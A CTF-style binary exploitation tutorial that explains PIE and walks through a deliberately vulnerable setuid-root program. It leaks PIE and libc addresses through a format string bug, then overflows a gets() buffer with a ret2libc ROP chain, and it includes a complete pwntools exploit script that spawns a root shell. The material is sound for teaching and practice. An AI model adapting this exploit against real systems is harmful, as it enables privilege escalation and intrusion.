description |
---|
08/26/2023 |
We're going to start getting pretty deep, stick this one out with me. We can do this together!
{% embed url="https://ir0nstone.gitbook.io/notes/types/stack/pie" %}
What is PIE?
PIE, or Position Independent Executable.
When this memory protection is enabled, this means that your program will be loaded into a different memory address each time.
This means that you will not be able to hardcode values such as function addresses and gadget locations without first finding out where they are.
How can we bypass this protection?
Just like anything else, nothing is 100% un-hackable.
Binaries protected with PIE means that they are based around relative rather than the usual absolute addresses. This means that the locations in memory are randomized; but the offsets between different parts of the binary remain the same.
(e.g.) If you know that the function main is located 0x128
-bytes AFTER the base address of the binary, find the location of main()
, and then subtract 0x128 from this to get the base address and you then can use this data for the addresses of everything else.
How can we exploit a binary with PIE enabled?
Simply put, all we need to do is find a single address and PIE will be bypassed. It is just another slight obstacle we will have to overcome to reach our goal. The rest will stay the same in the exploitation process.
How can we leak this address?
Remember back in format-string-vulnerabilities.md, we were able to leak data off of the stack and from any address?
Be sure to check this out:
{% embed url="https://ir0nstone.gitbook.io/notes/types/stack/pie/pie-exploit" %}
One last thing to consider:
Why does this seem so similar to Address Space Layout Randomization (ASLR)?
This is because they are similar, but it's how they are applied and used within the system.
ASLR is Operating System-level and applies to stack addresses generally.
PIE follows a very similar concept; however, it is specifically applied to the binary directly.
Well, we can utilize format string bugs or other ways to read the value off of the stack.
The value will always be a static offset away from the binary base, enabling us to completely bypass PIE.
NOTE:
The base address of a PIE executable will ALWAYS end in the hexadecimal characters 000
. This is because paging is being used to randomize things in memory which have a fixed size of 0x1000
.
This is very useful for troubleshooting if your exploit is not working as intended.
Check to see if the base address ends in 000
if your exploit is acting weird.
We will be combining the last two techniques that we learned, format-string-vulnerabilities.md and ret2libc! We will be also bypassing the PIE protection.
Ultimately, we need to find a way to leak the libc
function to leak the base, and then find a way to the functions that we are most interested in.
In this example, we will be leaking the PIE address to bypass PIE!
{% embed url="https://www.youtube.com/watch?v=NAUA1EB-TZg" %} CryptoCat {% endembed %}
{% embed url="https://github.com/Crypto-Cat/CTF/tree/main/pwn/binary_exploitation_101/08-leak_pie_ret2libc" %}
sudo chown root:root flag.txt
sudo chmod 600 flag.txt
sudo chown root:root pie_server
sudo chmod 4655 pie_server
file
:
{% code overflow="wrap" %}
pie_server: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=358390e52d086a4d5ef65c02f2dff0796b81dc69, for GNU/Linux 3.2.0, not stripped
{% endcode %}
- 64-bit executable
- Dynamically linked to
libc
- Not stripped
checksec
:
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
- NX is enabled
- PIE is enabled
Let's obtain some additional situational awareness and get a lay of the land just by seeing what the binary does and what it is asking for.
What's the point of this program?
Haha, this is great. The developer is taunting us a little bit with the new PIE protection set in place.
The program is asking us to enter our name, storing our STDIN somewhere in memory and then reflecting it back at us after "Hello <name_entered>".
After we press enter again, the program will exit gracefully.
We were able to segfault by placing a long string of A's in the buffer:
Segmentation Fault
Load up the binary in Ghidra and let's have a look at what we're working with.
I always rename things and convert when needed to make it easier on me.
main()
:
undefined8 main(void)
{
setuid(0);
setgid(0);
enter_name();
puts(
"\nGood luck with your ret2libc, you\'ll never bypass my new PIE protection OR find out where my lib-c library is :P\n"
);
vuln();
return 0;
}
setuid
andsetgid
of0
means that the executable will be ran with the privileges of the owner of the file -- in this case, root privileges because of the0
- This helps ensure we get full root access upon successful exploitation
- We then make a call to
enter_name()
, which will be analyzed below - Once the conditions of that function are met, we will return back to
main()
, useputs()
to output a string and callvuln()
- After
vuln()
, we willreturn 0
, and exit the program gracefully
enter_name()
:
void enter_name(void)
{
char buffer [64];
puts("Please enter your name:");
fgets(buffer,64,stdin);
printf("Hello ");
printf(buffer);
return;
}
- We have a char-type buffer with the size of 64-bytes
puts()
is printing out "please enter your name:
" asking for user-inputfgets()
is storing our input in the pre-defined 64-byte buffer, using stdin as an argument to store our input- Note:
fgets()
is not vulnerable because it is checking that our input is within 64-bytes - There are some work arounds, but it is much safer than
gets()
- We need to be conscious of an off-by-one if it fills up all 64-bytes
- Note:
printf()
will then display "Hello
" followed by our input.- Lastly, we will return back into
main()
- The second
printf()
is a Format String Vulnerability since it is stemming from STDIN user-input and does NOT specify a format specifier
vuln()
:
void vuln(void)
{
char buffer [256];
gets(buffer);
return;
}
- We have a char-based buffer with the size of 256-bytes
- This is reserved for our
- We then use the vulnerable and deprecated
gets()
function that will read a line from STDIN into the buffer that is pointed to (buffer
) - Lastly, we will return to
main()
.
Segfault from gets()
We can actually see our gets()
function biting us because of our overflow of over 256-bytes of A's.
So interesting, we can actually overflow both buffers from fgets()
and gets()
.
Sending a huge string in gdb
:
We can see that our return address and registers have been filled with A's due to gets()
usage.
Analysis has been completed, let's begin attacking our binary protected with PIE and NX enabled.
We want to focus on leaking PIE and libc
.
We can break this up in a high-level view of leaking of the PIE/ libc
base followed with a buffer overflow attack.
We need to find out what the PIE base address is.
We need to try to find out what index will be the SAME EACH time so that we can then use to calculate the PIE base.
Once we do that and we know where our standard place is and we know where all of the functions are, we can go to the buffer overflow portion of our attack.
One way we can do this is with a string format vulnerability, which we will be showcasing here.
For the buffer overflow, we will print out the GOT of puts()
, POP
the GOT of puts()
into the RDI
register for the first parameter.
We will then call puts()
and return back to the start of main()
or another function since we leaked out the PIE base (GOT
of puts()
).
We then need to go back to the start of main()
or puts()
and perform another buffer overflow and use the libc
library that we leaked to call system()
.
If we were to look at our addresses in gdb, we would see that we do not actually get valid addresses, but rather offsets. This is all the work of PIE.
Viewing offsets of our functions due to PIE
KEEP IN MIND:
Although the BASE ADDRESS will be DIFFERENT EACH time the binary is ran, the OFFSET will REMAIN THE SAME with each execution.
To combat the PIE protection, all we need to do is subtract the offset value (which is highlighted in the red boxes in the screenshot above) by the value that we leak and we will then be at the base of the binary.
Putting it all together:
Subtract offset from leaked value = base of the binary.
So, if we wanted to find enter_name()
, we can add the offset to the base address and find enter_name()
!
There are some tools built into pwndbg
that will help us with this!
- PIEBASE -- obtain base of binary
- BREAKRVA -- break at offset
To begin, the program must be running.
Set a breakpoint on main()
.
We can obtain the offset of our gets()
call from Ghidra and use BREAKRVA to set a breakpoint there.
We see that the offset to gets()
is 0x11f0
breakrva 0x11f0
Remember, only the base address will change with PIE enabled, not the offset.
So at this point, you can go ahead and delete the breakpoints since we are used to the syntax:
delete breakpoints
cyclic 500
Run the program, and send this AFTER you enter your name because that is where the gets()
call is being made, not where your name is being asked. You will see that we segmentation fault, this is good.
We want to look at the 8-bytes inside of RSP because this is what would have made it into the RIP:
We can see the string iaaaaaab
cyclic -l iaaaaaab
Offset at 264
Our RIP offset is 264.
So this means that we will need 264-bytes before we begin to overwrite the return address.
This time we will be overwriting the return address with a ROP chain that will call puts()
to leak out the puts()
address to go back to the start of the vuln()
function.
Next, we will do another ROP chain to call system("/bin/sh")
.
We can utilize the following script for this.
fuzz.py
:
from pwn import *
# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw)
# Specify your GDB script here for debugging
gdbscript = '''
init-pwndbg
piebase
continue
'''.format(**locals())
# Set up pwntools for the correct architecture
exe = './pie_server'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Enable verbose logging so we can see exactly what is being sent (info/debug)
context.log_level = 'warning'
# ===========================================================
# EXPLOIT GOES HERE
# ===========================================================
# Let's fuzz x values
for i in range(30):
try:
p = start()
# Format the counter
# e.g. %2$s will attempt to print [i]th pointer/string/hex/char/int
p.sendlineafter(b':', '%{}$p'.format(i).encode())
# Receive the response
p.recvuntil(b'Hello ')
result = p.recvline()
print(str(i) + ': ' + str(result))
p.close()
except EOFError:
pass
Results of fuzz.py
:
Our 15th element looks interesting
Run this a few times and you will see that we are printing strictly pointers due to the $p
.
It's good practice to unhex
anything that seems interesting.
Also, be on the lookout for addresses/offsets that do not change upon repeated execution.
-
Run this script twice at least
-
Values that do not change per execution:
0x5555555596b0 0x555555555224 0x5555555551f8 0x7fffffffe198
One cool thing to note is that 0xfffff
... addresses usually mean something external, so libc
or something else!
Take the leaked address and subtract it from the PIEBASE:
pwndbg> x 0x555555555224 - 0x555555554000
0x1224: Cannot access memory at address 0x1224
0x1224
- Leak the 15th element off of the stack and subtract from
0x1224
in hex and you now have the base of the binary - To find your way to another function, add your offset of that function
- You want to look for PIE addresses, they usually start with
0x5
6,0x55
, or0x54
- If you can ensure that the last 2 digits do not change, you have identified a fixed offset from the PIE base
exploit.py
:
from pwn import *
# Identify target binary/checksec disabled & Identify libc library/checksec disabled
exe = context.binary = ELF('./pie_server', checksec=False)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
context.terminal = ['mate-terminal', '-e']
# Enable or disable debugging verbosity
# context.log_level = 'debug'
p = exe.process()
# p = remote('hack.me', 31081)
# Calculated offset
offset = 264
##################### pie leak ######################
# Target the 15th element on the stack with the string format vulnerability to leak PIE
p.sendlineafter(b'name:\n', b'%15$p')
leak = p.recv().split(b'\n')[0].lstrip(b'Hello ')
# Leaked Address (0x555555555224) - PIEBASE (0x555555554000) = Offset of 0x1224
pie_base = int(leak, 16) - 0x1224
log.info(f'pie base: {hex(pie_base)}')
# gdb.attach(p, gdbscript=f'xinfo {pie_base}')
# pause()
# p.interactive()
######################################################
##################### libc leak ######################
exe.address = pie_base
rop = ROP(exe)
rop.puts(exe.got.puts)
rop.vuln()
payload = flat({
offset: [
rop.chain()
],
})
p.sendline(payload)
leak = p.recv().rstrip(b'\n')
puts_got_leak = u64(leak.ljust(8, b'\x00'))
libc_base = puts_got_leak - libc.symbols['puts']
log.info(f'libc base: {hex(libc_base)}')
# gdb.attach(p, gdbscript=f'xinfo {libc_base}')
# pause()
# p.interactive()
######################################################
####################### shell ########################
libc.address = libc_base
rop = ROP(libc)
rop.system(next(libc.search(b'/bin/sh\x00')))
payload = flat({
offset: [
rop.find_gadget(['ret'])[0],
rop.chain()
],
})
p.sendline(payload)
p.interactive()
Be aware, you will more than likely need to change your exploit because you will have different environment variables and addresses/offsets in your libc
library.
Obtain ROP Gadget via ropper
:
ropper --file pie_server --search "pop rdi"
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdi
[INFO] File: pie_server
0x00000000000012ab: pop rdi; ret;
0x12ab
Remember, we want to POP
the GOT of puts()
into the RDI
register as a first parameter, that is why we need a ROP Gadget.
But, we can't use POP RDI
until we set the leaked address.
libc
Base:
readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep puts
524: 000000000012ccd0 660 FUNC GLOBAL DEFAULT 15 putsgent@@GLIBC_2.10
Obtain system()
and "/bin/sh"
addresses:
readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep system
1481: 0000000000050d60 45 FUNC WEAK DEFAULT 15 system@@GLIBC_2.2.5
strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep /bin/sh
1d8698 /bin/sh
If we were to feed these values to gdb
, we would get some pretty cool data back.
Utilize this database to find offsets:
{% embed url="https://libc.blukat.me/" %}
Although we identified our PIE base, it does not seem to be very interesting when examining the data: \
Running our exploit:
To reiterate from earlier:
In this tutorial, we were able to leak a PIE address and libc
address utilizing a format string bug, leak the libc
address.
To exploit the vulnerable buffer via buffer overflow due to gets()
, we will print out the GOT of puts()
, POP
the GOT of puts()
into the RDI
register for the first parameter.
puts()
-> POP, RDI
-> First Parameter
We will then call puts()
and return back to the start of main()
or whatever parent function since we leaked out the PIE base (GOT
of puts()
).
We then need to go back to the start of main()
or puts()
and perform another buffer overflow and use the libc
library that we leaked to call system("/bin/sh")
. Ultimately granting us a shell with root access.